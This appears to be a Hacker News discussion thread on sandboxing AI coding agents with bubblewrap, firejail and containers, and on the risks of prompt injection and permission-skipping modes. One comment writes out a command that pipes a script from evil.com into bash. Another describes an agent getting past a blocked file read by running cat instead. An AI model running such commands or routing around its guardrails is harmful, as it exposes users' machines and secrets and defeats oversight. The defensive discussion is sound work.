I don't think bubblewrap is any better in that regard.
Why do you say that?
Bubblewrap is a it's a very minimal setuid binary. It's 4000 lines of C but essentially all it does is parse your flags ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
bwrap just works in rootless mode and doesn't tamper with your firewall.
How do you prevent an agent that simply console.logs(process.env.SUPER_SECRET) and then looking at the log?
Great question! You might enjoy this writeup, which in one section explores avoiding the use of shell variables that are not exported as a method of mitigating this risk.
https://linus.schreibt.jetzt/posts/shell-secrets.html
Your app run in the app context, that is not accessible for an AI.
You don't let your agent look at logs? How can it debug?
https://github.com/containers/bubblewrap/issues/142
dontenvx solves this by encrypting your .env file so you can even commit it safely
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.
Smart approach to AI agent security. The balance between convenience and protection is tricky.
How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.
Are there any good reasons to pick one over the other?
sydbox is intresting alternative (written in rust by linux developer)
https://gitlab.exherbo.org/sydbox/sydbox
UPDATE: there is other sydbox written in go, not related and seems different too far from bwrap
I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”
Docker won’t save you from prompt injektions that attack your network.
No kidding? https://taoofmac.com/space/blog/2026/01/12/1830
Still, I don’t think bubblewrap is either a simple or safe enough solution.
Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad
Because we've judged it to be worth it!
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
You seem to be saying "I want all the benefits of YOLO mode without YOLO mode". You can just… use the normal mode if you want more security, it asks for permission for things.
> Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
One of the things Claude can do is write its own tools, even its own programming languages. There's no fundamental way to make it impossible to run something dangerous, there is only trust.
It's remarkable that these models are now good enough that people can get away with trusting them like this. But, as Simon has himself said on other occasions, this is "normalisation of deviance". I'm rather the opposite: as I have minimal security experience but also have a few decades of watching news about corporations suffering leaks, I am absolutely not willing to run in YOLO mode at this point, even though I already have an entirely separate machine for claude with the bare minimum of other things logged in, to the extent that it's a separate github account specifically for untrusted devices.
> propose to run a malicious Bash command
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Because if you give an agent Bash it can do anything they can be achieved by running commands in Bash, which is almost anything.
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
> whitelist specific actions
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
> write new code and execute that code (how else can it iterate?)
Yeah, this is the point where I'd want to keep a human in the loop. Because you'd do that if you were pair programming with a human on the same computer, right?
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Go for it. They have allow and deny lists.
That's a great deal of work to get an agent that's a whole lot less capable.
Much better to allow full Bash but run in a sandbox that controls file and network access.
Agents know that.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will make that file empty (not really, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
> That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
No, you don't. You have a command generated by auditable, conventional code (in the agent wrapper) rather than by a neural network.
That command will have to take some input from neural network though? And we're back in Bobby Tables scenario
No, that argument makes no sense. SQL injection doesn't happen because of where the input comes from; it happens because of how the input is handled. We can avoid Bobby Tables scenarios while receiving input that influences SQL queries from humans, never mind neural networks. We do it by controlling the system that transforms the input into a query (e.g. by using properly parameterized queries).
Because the OS already provides data security and redundancy features. Why reimplement?
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
[dead]
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
This is functionally equivalent to auto approving all bash commands, unless you prevent those tests from shelling put to bash.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
> Because we've judged it to be worth it!
Famous last words
Just like every package manager already does? This issue predates LLMs and people have never cared enough to pressure dev tooling into caring. LLMs have seemingly created a world where people are finally trying to solve the long existing "oh shit there's code execution everywhere in my dev environment where I have insane levels of access to prod etc" problem.
People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.
The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.
Or just holding the tool the way it’s meant to be held :)
I’ll stop torturing the analogy now, but what I mean by that is that you can use the tools productively and safely. The insistence on running everything as the same user seems unnecessary. It’s like an X-Y problem.
Really this is on the tool makers (looking at you Anthropic) not prioritizing security by default so the users can just use the tools without getting burned and without losing velocity.
How does this compare with container-use?
https://container-use.com/introduction
This is exactly what I want, but don't really want to run Docker all the time. Nicer git worktrees and isolation of code so I can run multiple agents. It even has the setup command stuff so "npm install" runs automatically.
I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.
I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.
Why not just use a hook on reads?
The link you need is https://github.com/containers/bubblewrap
Don't leave prod secrets in your dev env.
I believe this is also what Claude Code uses for the sandbox option.
Hi!
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?
This is what I have been using with opencode:
I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
Hey! I just did this last night!
Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
Had this same idea in my head. Glad someone done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesnt matter.
So, Flatpak?
Funny enough Bubblewrap is also what Flatpak uses.
I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker
May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions